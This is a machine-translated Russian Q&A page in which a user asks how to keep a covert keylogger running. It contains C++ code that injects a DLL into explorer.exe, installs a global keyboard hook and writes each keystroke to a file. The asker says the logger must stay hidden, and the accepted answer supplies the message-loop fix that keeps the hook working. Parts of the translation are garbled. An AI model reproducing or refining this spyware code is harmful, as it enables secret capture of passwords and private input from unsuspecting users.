Бесконечный цикл в dll вводится на explorer.exe
0
Я пытаюсь создать кейлоггер на Windows 7. Чтобы сделать это, я создал Dll (setHook.dll), который я setHook.dll в новый поток explorer.exe. В этой первой DLL я открываю другую dll, которая содержит функцию (hookfunc), вызываемую на каждом вводе клавиатуры.
Мне нужно, чтобы моя Dll работала в фоновом режиме, потому что, если она умирает, я потерял функцию Hook. Чтобы сделать это, я попытался:
-
Sleep(INFINITE);: работает момент, но explorer.exe crash -
while(1);вwhile(1);: работает момент, но explorer.exe crash -
system("pause"): работает! Но я не хочу, чтобы на экране появлялась консоль, мой кейлоггер должен быть осторожным. -
getchar(): то же, что иsystem("pause"); -
system("pause > null");: доступ закрыт -
this_thread::sleep_for(chrono::seconds(10)): explorer crash
SetHook.dll:
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID)
{
HMODULE dll;
HOOKPROC addr;
HHOOK handle;
if (dwReason != DLL_PROCESS_ATTACH)
return true;
if (!(dll = LoadLibraryA("E:\\Projets\\Visual Studio 2013\\Projets\\inject\\x64\\Debug\\inject.dll")))
return false;
if (!(addr = (HOOKPROC)GetProcAddress(dll, "hookfunc")))
return false;
if (!(handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, 0)))
return false;
Sleep(INFINITE); //issue here
return true;
}
CallbackFunc: (я не думаю, что это может помочь)
LRESULT CALLBACK hookfunc(int code, WPARAM wParam, LPARAM lParam)
{
std::ofstream file;
WORD buf = 0;
BYTE KeyState[256];
file.open("E:\\function.txt", std::ofstream::out | std::ofstream::app);
if (code >= 0 && KEYUP(lParam))
{
if (wParam == VK_RETURN)
file << "[ENTER]";
else
{
GetKeyboardState(KeyState);
ToAscii(wParam, lParam, KeyState, &buf, 0);
file << (char)buf;
}
}
file.close();
return (CallNextHookEx(NULL, code, wParam, lParam));
}
Код работает, мне просто нужен сдержанный бесконечный цикл вместо Sleep (INFINITE). Есть идеи?
-
0Вы должны вернуться из DllMain или процесс зависнет. Возврат из DllMain не приводит к выгрузке DLL.Harry Johnston
1 ответ
2
Лучший ответ
Сон в DllMain - почти наверняка плохая идея.
Я предполагаю, что вы пытаетесь установить глобальный крючок. Для этого вам необходимо запустить цикл сообщений в приложении-инжекторе, например:
while(GetMessage(&msg, NULL, 0, 0 ))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
Krumelur
Поделиться
-
0+1, это верное решение ИМХО
-
0Мое приложение инжектора это Dll. Я вынужден поместить весь этот код в инжектор? Моя цель - не запускать процесс
Показать ещё 5 комментариев
Ещё вопросы
- 0Возможно ли получить ссылку на массив от референта его элемента?
- 0Об обработке исключений в C ++
- 1Каждый символ заменить из строки в Python
- 1Отправка электронного письма с приложением из приложения
- 0MySQL: mysqli_fetch_array ()
- 0Сделайте флажки отмеченными, оставаясь отмеченными после возвращения на страницу
- 1Программа NullPointerException LifeGame.java
- 0Использование jQuery .each () для перебора элементов одного идентификатора для .attr () в backbone.js
- 1Как передать URL содержит? , /, & внутри колбы веб-сервис метод
- 1Сбрасываемая RangeBase (Slider) в WPF
- 1Установить Enum Array на основе другого массива Enum в той же модели - Mongoose
- 0Результаты glRotatef на Wirecube
- 1ASP.NET MVC 4 передача значений между списками
- 0C3P0 один сервер несколько баз данных
- 1Как вы используете поля ввода tkinter для создания переменной?
- 1EntityFramework - Как заполнить дочерние элементы?
- 1Код для создания личности в онтологии?
- 0Как вычесть количество моих продуктов, перечисленных в списке, непосредственно в мою базу данных продуктов? (Баз данных)
- 1C # правильный синтаксис foreach для перебора списка
- 1Android: как подключить Studio к виртуальному устройству Genymotion?
- 1Android - не удается обнаружить QR-код с библиотекой zxing
- 0isset не работает при отправке формы (на самом деле проблема с БД)
- 1считать длину поля поиска в динамике crm
- 1Панды: ускорение группового
- 1Конвертировать SQL в Entity Framework
- 0PHP: как вернуть счетчик значения из рекурсивной функции?
- 1PrintWriter удаляет старое содержимое текстового файла при записи
- 1«Ни один экземпляр типа Hra не доступен».
- 1отображать изображение при загрузке в asp.net
- 0Как получить значение даты из защищенного массива?
- 1Студия Android: UnsupportedOperationException: операция не поддерживается> для коллекции только для чтения
- 0Перерыв на слово в iOS7
- 1Python-запросы GET со строками из списка
- 0Глобальная переменная Twig для каждого пакета, Symfony2
- 0Нажатие кнопки не срабатывает, если div движется вниз
- 1Сервис автоматического выхода из системы в приложении wpf
- 0Что нужно для минималистичного видеосервера ONVIF?
- 1Конфигурация @Bean вместо context.xml
- 0AngularJS - передать параметры в контроллер?
- 1Задача <TEntity> предпочтительный способ сделать хранилище
- 0SQL-запрос для последней категории сотрудников, у каждого из которых несколько записей с одинаковым идентификатором
- 1Lwjgl, как упростить карту высот, чтобы получить более высокие fps?
- 1короткие клавиши для меню не работает в wpf в призме
- 1Discord.py Бот отправляет файл на канал Discord
- 1Копировать весь текстовый документ, включая таблицы, в другой, используя Python
- 1KnockoutJS - настройка меню выбора на основе выбора в другом меню
- 1Scipy rv_continuous неправильно генерирует образец из распределения
- 1Изменить TextInputLayout Hint Font
- 0Неверное значение по умолчанию для date_available
